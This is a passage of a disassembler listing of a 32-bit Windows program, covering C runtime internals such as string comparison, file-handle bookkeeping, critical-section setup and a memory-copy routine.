jz short loc_41CA30
push esi
call sub_414A14
pop ecx
loc_41CA30: ; CODE XREF: sub_41C959+7�j
; sub_41C959+C6�j ...
pop esi
retn
sub_41C959 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_41CA54: ; CODE XREF: .text:0041CA61�j
mov al, [edx]
or al, al
jz short loc_41CA63
add edx, 1
bts [esp], eax
jmp short loc_41CA54
; ---------------------------------------------------------------------------
loc_41CA63: ; CODE XREF: .text:0041CA58�j
mov esi, [ebp+8]
or ecx, 0FFFFFFFFh
lea ecx, [ecx+0]
loc_41CA6C: ; CODE XREF: .text:0041CA7C�j
add ecx, 1
mov al, [esi]
or al, al
jz short loc_41CA7E
add esi, 1
bt [esp], eax
jnb short loc_41CA6C
loc_41CA7E: ; CODE XREF: .text:0041CA73�j
mov eax, ecx
add esp, 20h
pop esi
leave
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41CA90 proc near ; CODE XREF: sub_41A204+1B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_41CADC
loc_41CAA0: ; CODE XREF: sub_41CA90+3C�j
; sub_41CA90+6A�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_41CAD4
or al, al
jz short loc_41CAD0
cmp ah, [ecx+1]
jnz short loc_41CAD4
or ah, ah
jz short loc_41CAD0
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_41CAD4
or al, al
jz short loc_41CAD0
cmp ah, [ecx+3]
jnz short loc_41CAD4
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_41CAA0
mov edi, edi
loc_41CAD0: ; CODE XREF: sub_41CA90+18�j
; sub_41CA90+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_41CAD4: ; CODE XREF: sub_41CA90+14�j
; sub_41CA90+1D�j ...
sbb eax, eax
shl eax, 1
add eax, 1
retn
; ---------------------------------------------------------------------------
loc_41CADC: ; CODE XREF: sub_41CA90+E�j
test edx, 1
jz short loc_41CAFC
mov al, [edx]
add edx, 1
cmp al, [ecx]
jnz short loc_41CAD4
add ecx, 1
or al, al
jz short loc_41CAD0
test edx, 2
jz short loc_41CAA0
loc_41CAFC: ; CODE XREF: sub_41CA90+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_41CAD4
or al, al
jz short loc_41CAD0
cmp ah, [ecx+1]
jnz short loc_41CAD4
or ah, ah
jz short loc_41CAD0
add ecx, 2
jmp short loc_41CAA0
sub_41CA90 endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [esp+0Ch]
test eax, eax
jz short locret_41CB72
mov edx, [esp+4]
push esi
push edi
mov esi, edx
mov edi, [esp+10h]
or edx, edi
and edx, 3
jz short loc_41CB73
test eax, 1
jz short loc_41CB53
mov cl, [esi]
cmp cl, [edi]
jnz short loc_41CBA0
add esi, 1
add edi, 1
sub eax, 1
jz short loc_41CB70
loc_41CB53: ; CODE XREF: .text:0041CB40�j
; .text:0041CB6E�j
mov cl, [esi]
mov dl, [edi]
cmp cl, dl
jnz short loc_41CBA0
mov cl, [esi+1]
mov dl, [edi+1]
cmp cl, dl
jnz short loc_41CBA0
add edi, 2
add esi, 2
sub eax, 2
jnz short loc_41CB53
loc_41CB70: ; CODE XREF: .text:0041CB51�j
; .text:0041CBAA�j
pop edi
pop esi
locret_41CB72: ; CODE XREF: .text:0041CB26�j
retn
; ---------------------------------------------------------------------------
loc_41CB73: ; CODE XREF: .text:0041CB39�j
mov ecx, eax
and eax, 3
shr ecx, 2
jz short loc_41CBA8
repe cmpsd
jz short loc_41CBA8
mov ecx, [esi-4]
mov edx, [edi-4]
cmp cl, dl
jnz short loc_41CB9B
cmp ch, dh
jnz short loc_41CB9B
shr ecx, 10h
shr edx, 10h
cmp cl, dl
jnz short loc_41CB9B
cmp ch, dh
loc_41CB9B: ; CODE XREF: .text:0041CB89�j
; .text:0041CB8D�j ...
mov eax, 0
loc_41CBA0: ; CODE XREF: .text:0041CB46�j
; .text:0041CB59�j ...
sbb eax, eax
pop edi
sbb eax, 0FFFFFFFFh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41CBA8: ; CODE XREF: .text:0041CB7B�j
; .text:0041CB7F�j
test eax, eax
jz short loc_41CB70
mov edx, [esi]
mov ecx, [edi]
cmp dl, cl
jnz short loc_41CB9B
sub eax, 1
jz short loc_41CBD5
cmp dh, ch
jnz short loc_41CB9B
sub eax, 1
jz short loc_41CBD5
and ecx, 0FF0000h
and edx, 0FF0000h
cmp edx, ecx
jnz short loc_41CB9B
sub eax, 1
loc_41CBD5: ; CODE XREF: .text:0041CBB7�j
; .text:0041CBC0�j
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
push esi
xor eax, eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
push eax
mov edx, [ebp+0Ch]
lea ecx, [ecx+0]
loc_41CBF4: ; CODE XREF: .text:0041CC01�j
mov al, [edx]
or al, al
jz short loc_41CC03
add edx, 1
bts [esp], eax
jmp short loc_41CBF4
; ---------------------------------------------------------------------------
loc_41CC03: ; CODE XREF: .text:0041CBF8�j
mov esi, [ebp+8]
mov edi, edi
loc_41CC08: ; CODE XREF: .text:0041CC15�j
mov al, [esi]
or al, al
jz short loc_41CC1A
add esi, 1
bt [esp], eax
jnb short loc_41CC08
lea eax, [esi-1]
loc_41CC1A: ; CODE XREF: .text:0041CC0C�j
add esp, 20h
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
sub_41CC20 proc near ; CODE XREF: sub_41D55D+220�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
cmp ecx, dword_47C618
push esi
push edi
jnb short loc_41CC83
mov eax, ecx
sar eax, 5
lea edi, ds:47C620h[eax*4]
mov eax, ecx
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [edi]
shl esi, 2
cmp dword ptr [esi+eax], 0FFFFFFFFh
jnz short loc_41CC83
cmp dword_42D7C4, 1
push ebx
mov ebx, [esp+0Ch+arg_4]
jnz short loc_41CC79
sub ecx, 0
jz short loc_41CC70
dec ecx
jz short loc_41CC6B
dec ecx
jnz short loc_41CC79
push ebx
push 0FFFFFFF4h
jmp short loc_41CC73
; ---------------------------------------------------------------------------
loc_41CC6B: ; CODE XREF: sub_41CC20+41�j
push ebx
push 0FFFFFFF5h
jmp short loc_41CC73
; ---------------------------------------------------------------------------
loc_41CC70: ; CODE XREF: sub_41CC20+3E�j
push ebx
push 0FFFFFFF6h
loc_41CC73: ; CODE XREF: sub_41CC20+49�j
; sub_41CC20+4E�j
call ds:dword_420150 ; SetStdHandle
loc_41CC79: ; CODE XREF: sub_41CC20+39�j
; sub_41CC20+44�j
mov eax, [edi]
mov [esi+eax], ebx
xor eax, eax
pop ebx
jmp short loc_41CC99
; ---------------------------------------------------------------------------
loc_41CC83: ; CODE XREF: sub_41CC20+C�j
; sub_41CC20+2B�j
call sub_419600
mov dword ptr [eax], 9
call sub_419609
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41CC99: ; CODE XREF: sub_41CC20+61�j
pop edi
pop esi
retn
sub_41CC20 endp
; =============== S U B R O U T I N E =======================================
sub_41CC9C proc near ; CODE XREF: sub_417C89+51�p
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
cmp ecx, dword_47C618
push esi
push edi
jnb short loc_41CD02
mov eax, ecx
sar eax, 5
lea edi, ds:47C620h[eax*4]
mov eax, ecx
and eax, 1Fh
lea esi, [eax+eax*8]
mov eax, [edi]
shl esi, 2
add eax, esi
test byte ptr [eax+4], 1
jz short loc_41CD02
cmp dword ptr [eax], 0FFFFFFFFh
jz short loc_41CD02
cmp dword_42D7C4, 1
jnz short loc_41CCF8
xor eax, eax
sub ecx, eax
jz short loc_41CCEF
dec ecx
jz short loc_41CCEA
dec ecx
jnz short loc_41CCF8
push eax
push 0FFFFFFF4h
jmp short loc_41CCF2
; ---------------------------------------------------------------------------
loc_41CCEA: ; CODE XREF: sub_41CC9C+44�j
push eax
push 0FFFFFFF5h
jmp short loc_41CCF2
; ---------------------------------------------------------------------------
loc_41CCEF: ; CODE XREF: sub_41CC9C+41�j
push eax
push 0FFFFFFF6h
loc_41CCF2: ; CODE XREF: sub_41CC9C+4C�j
; sub_41CC9C+51�j
call ds:dword_420150 ; SetStdHandle
loc_41CCF8: ; CODE XREF: sub_41CC9C+3B�j
; sub_41CC9C+47�j
mov eax, [edi]
or dword ptr [esi+eax], 0FFFFFFFFh
xor eax, eax
jmp short loc_41CD18
; ---------------------------------------------------------------------------
loc_41CD02: ; CODE XREF: sub_41CC9C+C�j
; sub_41CC9C+2D�j ...
call sub_419600
mov dword ptr [eax], 9
call sub_419609
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
loc_41CD18: ; CODE XREF: sub_41CC9C+64�j
pop edi
pop esi
retn
sub_41CC9C endp
; =============== S U B R O U T I N E =======================================
sub_41CD1B proc near ; CODE XREF: sub_417C89+7�p
; sub_417C89+1E�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp eax, dword_47C618
jnb short loc_41CD45
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_47C620[ecx*4]
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4]
test byte ptr [eax+4], 1
jz short loc_41CD45
mov eax, [eax]
retn
; ---------------------------------------------------------------------------
loc_41CD45: ; CODE XREF: sub_41CD1B+A�j
; sub_41CD1B+25�j
call sub_419600
mov dword ptr [eax], 9
call sub_419609
and dword ptr [eax], 0
or eax, 0FFFFFFFFh
retn
sub_41CD1B endp
; =============== S U B R O U T I N E =======================================
sub_41CD5C proc near ; CODE XREF: sub_417D0C+38�p
; sub_419087+38�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push ebx
push esi
mov ecx, eax
sar ecx, 5
and eax, 1Fh
push edi
lea ebx, ds:47C620h[ecx*4]
mov esi, [ebx]
lea edi, [eax+eax*8]
shl edi, 2
add esi, edi
cmp dword ptr [esi+8], 0
jnz short loc_41CDBB
push 0Ah
call sub_418285
cmp dword ptr [esi+8], 0
pop ecx
jnz short loc_41CDB3
lea eax, [esi+0Ch]
push 0FA0h
push eax
call sub_41D188
test eax, eax
pop ecx
pop ecx
jnz short loc_41CDB0
push 0Ah
call sub_4181F1
pop ecx
xor eax, eax
jmp short loc_41CDCB
; ---------------------------------------------------------------------------
loc_41CDB0: ; CODE XREF: sub_41CD5C+46�j
inc dword ptr [esi+8]
loc_41CDB3: ; CODE XREF: sub_41CD5C+32�j
push 0Ah
call sub_4181F1
pop ecx
loc_41CDBB: ; CODE XREF: sub_41CD5C+24�j
mov eax, [ebx]
lea eax, [eax+edi+0Ch]
push eax
call ds:dword_42001C ; RtlEnterCriticalSection
xor eax, eax
inc eax
loc_41CDCB: ; CODE XREF: sub_41CD5C+52�j
pop edi
pop esi
pop ebx
retn
sub_41CD5C endp
; =============== S U B R O U T I N E =======================================
sub_41CDCF proc near ; CODE XREF: sub_417D83+1�p
; sub_41910E+1�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, eax
and eax, 1Fh
sar ecx, 5
mov ecx, dword_47C620[ecx*4]
lea eax, [eax+eax*8]
lea eax, [ecx+eax*4+0Ch]
push eax
call ds:dword_420018 ; RtlLeaveCriticalSection
retn
sub_41CDCF endp
; =============== S U B R O U T I N E =======================================
sub_41CDF1 proc near ; CODE XREF: sub_41D55D:loc_41D6F1�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ecx
push ecx
push ebp
push 0Bh
or ebp, 0FFFFFFFFh
call sub_418206
test eax, eax
pop ecx
jz loc_41CF38
push ebx
push esi
push edi
push 0Bh
call sub_418285
xor ebx, ebx
pop ecx
mov [esp+18h+var_8], ebx
mov [esp+18h+var_4], ebx
mov edi, offset dword_47C620
loc_41CE21: ; CODE XREF: sub_41CDF1+D5�j
mov esi, [edi]
test esi, esi
jz loc_41CED8
lea eax, [esi+480h]
jmp short loc_41CE91
; ---------------------------------------------------------------------------
loc_41CE33: ; CODE XREF: sub_41CDF1+A2�j
test byte ptr [esi+4], 1
jnz short loc_41CE87
cmp dword ptr [esi+8], 0
jnz short loc_41CE6C
push 0Ah
call sub_418285
cmp dword ptr [esi+8], 0
pop ecx
jnz short loc_41CE64
lea eax, [esi+0Ch]
push 0FA0h
push eax
call sub_41D188
test eax, eax
pop ecx
pop ecx
jz short loc_41CECE
inc dword ptr [esi+8]
loc_41CE64: ; CODE XREF: sub_41CDF1+5A�j
push 0Ah
call sub_4181F1
pop ecx
loc_41CE6C: ; CODE XREF: sub_41CDF1+4C�j
lea ebx, [esi+0Ch]
push ebx
call ds:dword_42001C ; RtlEnterCriticalSection
test byte ptr [esi+4], 1
jz short loc_41CE97
push ebx
call ds:dword_420018 ; RtlLeaveCriticalSection
mov ebx, [esp+18h+var_8]
loc_41CE87: ; CODE XREF: sub_41CDF1+46�j
mov eax, [edi]
add esi, 24h
add eax, 480h
loc_41CE91: ; CODE XREF: sub_41CDF1+40�j
cmp esi, eax
jb short loc_41CE33
jmp short loc_41CEB3
; ---------------------------------------------------------------------------
loc_41CE97: ; CODE XREF: sub_41CDF1+89�j
or dword ptr [esi], 0FFFFFFFFh
mov eax, esi
sub eax, [edi]
push 24h
cdq
pop ecx
idiv ecx
mov ebp, eax
add ebp, [esp+18h+var_4]
cmp ebp, 0FFFFFFFFh
jnz short loc_41CF2D
mov ebx, [esp+18h+var_8]
loc_41CEB3: ; CODE XREF: sub_41CDF1+A4�j
add [esp+18h+var_4], 20h
inc ebx
add edi, 4
cmp edi, offset dword_47C720
mov [esp+18h+var_8], ebx
jl loc_41CE21
jmp short loc_41CF2D
; ---------------------------------------------------------------------------
loc_41CECE: ; CODE XREF: sub_41CDF1+6E�j
push 0Ah
call sub_4181F1
pop ecx
jmp short loc_41CF2A
; ---------------------------------------------------------------------------
loc_41CED8: ; CODE XREF: sub_41CDF1+34�j
mov esi, 480h
push esi
call sub_414E7D
test eax, eax
pop ecx
jz short loc_41CF2D
add dword_47C618, 20h
lea ecx, ds:47C620h[ebx*4]
mov [ecx], eax
lea edx, [eax+480h]
jmp short loc_41CF16
; ---------------------------------------------------------------------------
loc_41CF00: ; CODE XREF: sub_41CDF1+127�j
and byte ptr [eax+4], 0
or dword ptr [eax], 0FFFFFFFFh
and dword ptr [eax+8], 0
mov byte ptr [eax+5], 0Ah
mov edx, [ecx]
add eax, 24h
add edx, esi
loc_41CF16: ; CODE XREF: sub_41CDF1+10D�j
cmp eax, edx
jb short loc_41CF00
shl ebx, 5
mov ebp, ebx
push ebp
call sub_41CD5C
test eax, eax
pop ecx
jnz short loc_41CF2D
loc_41CF2A: ; CODE XREF: sub_41CDF1+E5�j
or ebp, 0FFFFFFFFh
loc_41CF2D: ; CODE XREF: sub_41CDF1+BC�j
; sub_41CDF1+DB�j ...
push 0Bh
call sub_4181F1
pop ecx
pop edi
pop esi
pop ebx
loc_41CF38: ; CODE XREF: sub_41CDF1+10�j
mov eax, ebp
pop ebp
pop ecx
pop ecx
retn
sub_41CDF1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CF3E proc near ; CODE XREF: sub_417E2F+1E�p
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 0041CFE6 SIZE 00000014 BYTES
push 0Ch
push offset stru_429A78
call __SEH_prolog
mov ebx, [ebp+arg_0]
cmp ebx, dword_47C618
jnb loc_41CFE6
mov eax, ebx
sar eax, 5
lea edi, ds:47C620h[eax*4]
mov eax, ebx
and eax, 1Fh
lea esi, [eax+eax*8]
shl esi, 2
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41CFE6
push ebx
call sub_41CD5C
pop ecx
and [ebp+ms_exc.disabled], 0
mov eax, [edi]
test byte ptr [eax+esi+4], 1
jz short loc_41CFBE
push ebx
call sub_41CD1B
pop ecx
push eax
call ds:dword_42014C ; FlushFileBuffers
test eax, eax
jnz short loc_41CFAA
call ds:dword_420008 ; RtlGetLastWin32Error
mov [ebp+var_1C], eax
jmp short loc_41CFAE
; ---------------------------------------------------------------------------
loc_41CFAA: ; CODE XREF: sub_41CF3E+5F�j
and [ebp+var_1C], 0
loc_41CFAE: ; CODE XREF: sub_41CF3E+6A�j
cmp [ebp+var_1C], 0
jz short loc_41CFCD
call sub_419609
mov ecx, [ebp+var_1C]
mov [eax], ecx
loc_41CFBE: ; CODE XREF: sub_41CF3E+4D�j
call sub_419600
mov dword ptr [eax], 9
or [ebp+var_1C], 0FFFFFFFFh
loc_41CFCD: ; CODE XREF: sub_41CF3E+74�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41CFDE
mov eax, [ebp+var_1C]
jmp short loc_41CFF4
sub_41CF3E endp
; =============== S U B R O U T I N E =======================================
sub_41CFDB proc near ; DATA XREF: .rdata:stru_429A78�o
mov ebx, [ebp+8]
sub_41CFDB endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41CFDE proc near ; CODE XREF: sub_41CF3E+93�p
push ebx
call sub_41CDCF
pop ecx
retn
sub_41CFDE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41CF3E
loc_41CFE6: ; CODE XREF: sub_41CF3E+15�j
; sub_41CF3E+39�j
call sub_419600
mov dword ptr [eax], 9
or eax, 0FFFFFFFFh
loc_41CFF4: ; CODE XREF: sub_41CF3E+9B�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41CF3E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_417FE4
loc_41CFFA: ; CODE XREF: sub_417FE4+E�j
push 10h
push offset stru_429A88
call __SEH_prolog
xor ebx, ebx
mov [ebp-1Ch], ebx
push 1
call sub_418285
pop ecx
mov [ebp-4], ebx
push 3
pop edi
loc_41D019: ; CODE XREF: sub_417FE4+5094�j
mov [ebp-20h], edi
cmp edi, dword_47D9A0
jge short loc_41D07A
mov esi, edi
shl esi, 2
mov eax, dword_47C984
mov eax, [esi+eax]
cmp eax, ebx
jz short loc_41D077
test byte ptr [eax+0Ch], 83h
jz short loc_41D04A
push eax
call sub_4149C3
pop ecx
cmp eax, 0FFFFFFFFh
jz short loc_41D04A
inc dword ptr [ebp-1Ch]
loc_41D04A: ; CODE XREF: sub_417FE4+5055�j
; sub_417FE4+5061�j
cmp edi, 14h
jl short loc_41D077
mov eax, dword_47C984
mov eax, [esi+eax]
add eax, 20h
push eax
call ds:dword_420024 ; RtlDeleteCriticalSection
mov eax, dword_47C984
push dword ptr [esi+eax]
call sub_414A14
pop ecx
mov eax, dword_47C984
mov [esi+eax], ebx
loc_41D077: ; CODE XREF: sub_417FE4+504F�j
; sub_417FE4+5069�j
inc edi
jmp short loc_41D019
; ---------------------------------------------------------------------------
loc_41D07A: ; CODE XREF: sub_417FE4+503E�j
or dword ptr [ebp-4], 0FFFFFFFFh
call sub_41D08C
mov eax, [ebp-1Ch]
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_417FE4
; =============== S U B R O U T I N E =======================================
sub_41D08C proc near ; CODE XREF: sub_417FE4+509A�p
; DATA XREF: .rdata:stru_429A88�o
push 1
call sub_4181F1
pop ecx
retn
sub_41D08C endp
; ---------------------------------------------------------------------------
align 4
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D0A0 proc near ; DATA XREF: __SEH_prolog�o
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_41D140
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_41D0D3: ; CODE XREF: sub_41D0A0+90�j
cmp esi, 0FFFFFFFFh
jz short loc_41D139
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_41D127
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_41D127
js short loc_41D132
mov edi, [ebx+8]
push ebx
call sub_415970
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_4159B2
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_415A46
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_41D127: ; CODE XREF: sub_41D0A0+40�j
; sub_41D0A0+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_41D0D3
; ---------------------------------------------------------------------------
loc_41D132: ; CODE XREF: sub_41D0A0+54�j
mov eax, 0
jmp short loc_41D155
; ---------------------------------------------------------------------------
loc_41D139: ; CODE XREF: sub_41D0A0+36�j
mov eax, 1
jmp short loc_41D155
; ---------------------------------------------------------------------------
loc_41D140: ; CODE XREF: sub_41D0A0+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_4159B2
add esp, 8
pop ebp
mov eax, 1
loc_41D155: ; CODE XREF: sub_41D0A0+97�j
; sub_41D0A0+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_41D0A0 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_4159B2
add esp, 8
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_41D178: ; DATA XREF: sub_41D188:loc_41D1CA�o
push dword ptr [esp+4]
call ds:dword_420148 ; InitializeCriticalSection
xor eax, eax
inc eax
retn 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D188 proc near ; CODE XREF: sub_418153+26�p
; sub_418206+49�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push 10h
push offset stru_429AC0
call __SEH_prolog
mov eax, dword_47C4FC
test eax, eax
jnz short loc_41D1D4
cmp dword_47C1A4, 1
jz short loc_41D1CA
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_4200A4 ; GetModuleHandleA
test eax, eax
jz short loc_41D1CA
push offset aInitializecrit ; "InitializeCriticalSectionAndSpinCount"
push eax
call ds:dword_420084 ; GetProcAddress
mov dword_47C4FC, eax
test eax, eax
jnz short loc_41D1D4
loc_41D1CA: ; CODE XREF: sub_41D188+1C�j
; sub_41D188+2B�j
mov eax, offset loc_41D178
mov dword_47C4FC, eax
loc_41D1D4: ; CODE XREF: sub_41D188+13�j
; sub_41D188+40�j
and [ebp+ms_exc.disabled], 0
push [ebp+arg_4]
push [ebp+arg_0]
call eax ; InitializeCriticalSectionAndSpinCount
mov [ebp+var_1C], eax
jmp short loc_41D209
; ---------------------------------------------------------------------------
loc_41D1E5: ; DATA XREF: .rdata:stru_429AC0�o
mov eax, [ebp+ms_exc.exc_ptr]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_20], eax
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
loc_41D1F3: ; DATA XREF: .rdata:stru_429AC0�o
mov esp, [ebp+ms_exc.old_esp]
cmp [ebp+var_20], 0C0000017h
jnz short loc_41D207
push 8
call ds:dword_420170 ; RtlSetLastWin32Error
loc_41D207: ; CODE XREF: sub_41D188+75�j
xor eax, eax
loc_41D209: ; CODE XREF: sub_41D188+5B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call __SEH_epilog
retn
sub_41D188 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D220 proc near ; CODE XREF: sub_418329+2DE�p
; sub_419886+13�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_41D240
cmp edi, eax
jb loc_41D3BC
loc_41D240: ; CODE XREF: sub_41D220+16�j
test edi, 3
jnz short loc_41D25C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41D27C
rep movsd
jmp ds:off_41D36C[edx*4]
; ---------------------------------------------------------------------------
loc_41D25C: ; CODE XREF: sub_41D220+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_41D274
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_41D27C+4[eax*4]
; ---------------------------------------------------------------------------
loc_41D274: ; CODE XREF: sub_41D220+46�j
jmp dword ptr ds:loc_41D37C[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41D27C: ; CODE XREF: sub_41D220+31�j
; sub_41D220+8E�j ...
jmp ds:off_41D300[ecx*4]
; ---------------------------------------------------------------------------
db 2 dup(90h)
; ---------------------------------------------------------------------------
rol byte ptr [ecx+0], cl
mov esp, 0E00041D2h
rol byte ptr [ecx+0], cl
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_41D27C
rep movsd
jmp ds:off_41D36C[edx*4]
; ---------------------------------------------------------------------------
align 4
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_41D27C
rep movsd
jmp ds:off_41D36C[edx*4]
; ---------------------------------------------------------------------------
align 10h
and edx, ecx
mov al, [esi]
mov [edi], al
add esi, 1
shr ecx, 2
add edi, 1
cmp ecx, 8
jb short loc_41D27C
rep movsd
jmp ds:off_41D36C[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_41D300 dd offset loc_41D363 ; DATA XREF: sub_41D220:loc_41D27C�r
dd offset loc_41D350
dd offset loc_41D348
dd offset loc_41D340
dd offset loc_41D338
dd offset loc_41D330
dd offset loc_41D328
dd offset loc_41D320
; ---------------------------------------------------------------------------
loc_41D320: ; CODE XREF: sub_41D220:loc_41D27C�j
; DATA XREF: sub_41D220+FC�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_41D328: ; CODE XREF: sub_41D220:loc_41D27C�j
; DATA XREF: sub_41D220+F8�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_41D330: ; CODE XREF: sub_41D220:loc_41D27C�j
; DATA XREF: sub_41D220+F4�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_41D338: ; CODE XREF: sub_41D220:loc_41D27C�j
; DATA XREF: sub_41D220+F0�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_41D340: ; CODE XREF: sub_41D220:loc_41D27C�j
; DATA XREF: sub_41D220+EC�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_41D348: ; CODE XREF: sub_41D220:loc_41D27C�j
; DATA XREF: sub_41D220+E8�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_41D350: ; CODE XREF: sub_41D220:loc_41D27C�j
; DATA XREF: sub_41D220+E4�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41D363: ; CODE XREF: sub_41D220:loc_41D27C�j
; DATA XREF: sub_41D220:off_41D300�o
jmp ds:off_41D36C[edx*4]
; ---------------------------------------------------------------------------
align 4
off_41D36C dd offset loc_41D37C ; DATA XREF: sub_41D220+35�r
; sub_41D220+92�r ...
dd offset loc_41D384
dd offset loc_41D390
dd offset loc_41D3A4
; ---------------------------------------------------------------------------
loc_41D37C: ; CODE XREF: sub_41D220+35�j
; sub_41D220+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41D384: ; CODE XREF: sub_41D220+35�j
; sub_41D220+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_41D390: ; CODE XREF: sub_41D220+35�j
; sub_41D220+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41D3A4: ; CODE XREF: sub_41D220+35�j
; sub_41D220+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41D3BC: ; CODE XREF: sub_41D220+1A�j
lea esi, [ecx+esi-4]
